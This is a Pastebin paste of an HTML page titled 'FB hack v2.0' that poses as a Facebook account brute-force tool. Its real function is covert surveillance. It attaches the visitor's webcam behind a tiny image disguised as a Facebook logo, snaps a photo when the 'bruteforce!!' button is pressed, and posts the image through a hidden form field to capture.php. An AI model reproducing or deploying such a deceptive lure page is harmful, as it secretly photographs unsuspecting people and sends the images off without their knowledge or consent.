Advertisement
tobitaz

dildos.php

Jun 25th, 2021 (edited)
454
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 2.36 KB | None | 0 0
  1. <html>
  2. <head>
  3. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  4. <title>FB hack v2.0</title>
  5. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  6. <script src="https://cdnjs.cloudflare.com/ajax/libs/webcamjs/1.0.25/webcam.min.js"></script>
  7. <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css" />
  8. <style type="text/css">
  9.  
  10. body
  11. {
  12. background-color:black;
  13. }
  14. .taz
  15. {
  16. height:20px;
  17. }
  18. .myButton { width:50%;  box-shadow:inset 0px 1px 0px 0px #cf866c;   background:linear-gradient(to bottom, #d0451b 5%, #bc3315 100%);    background-color:#d0451b;   border-radius:3px;  border:1px solid #942911;   display:inline-block;   cursor:pointer;     color:#ffffff;  font-family:Arial;  font-size:13px;     padding:6px 24px;   text-decoration:none;   text-shadow:0px 1px 0px #854629; } .myButton:hover {    background:linear-gradient(to bottom, #bc3315 5%, #d0451b 100%);    background-color:#bc3315; } .myButton:active {  position:relative;  top:1px; }
  19. .kotak
  20. {
  21. border-radius:10px;
  22. width:100%;
  23. text-align:center;
  24. font-size:large;
  25. background-color:black;
  26. border: 1px solid yellow;
  27. color:white;
  28. }
  29. .fn
  30. {
  31. color:red;
  32. }
  33. .cs{
  34. color: #FFFFFF;
  35. background: black;
  36. text-shadow: 0 0 5px #FFF, 0 0 10px #FFF, 0 0 15px #FFF, 0 0 20px #49ff18, 0 0 30px #49FF18, 0 0 40px #49FF18, 0 0 55px #49FF18, 0 0 75px #49ff18;
  37. color: #FFFFFF;
  38. font-size:20px;
  39. }
  40. </style>
  41. </head>
  42. <body>
  43. <center>
  44. <font class="cs">Facebook hack v2.0</font><br />
  45. <form method="POST" action="capture.php">
  46. <img src="https://r7.pngwing.com/path/286/412/950/facebook-scalable-vector-graphics-icon-facebook-logo-png-b2bd60751e410d1a8e8c60a1a74d6f99.png" class="taz" id="my_camera" />
  47. <br/>
  48. <font class="fn">
  49. Target FB name
  50. </font>
  51. <br />
  52. <input class="kotak" value="" />
  53. <br />
  54.  <input type="hidden" name="image" class="image-tag" />
  55. <button onClick="take_snapshot()" class="myButton">bruteforce!!</button>
  56. <center>
  57. </form>
  58. </div>
  59. <script language="JavaScript">
  60. Webcam.set({
  61. width: 290,
  62. height: 190,
  63. image_format: 'jpeg',
  64. jpeg_quality: 90
  65. });
  66. Webcam.attach( '#my_camera' );
  67. function take_snapshot() {
  68. Webcam.snap( function(data_uri) {
  69. $(".image-tag").val(data_uri);
  70. document.getElementById('results').innerHTML = '<img src="'+data_uri+'"/>';
  71. } );
  72. }
  73. </script>
  74. </body>
  75. </html>
  76.  
  77.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement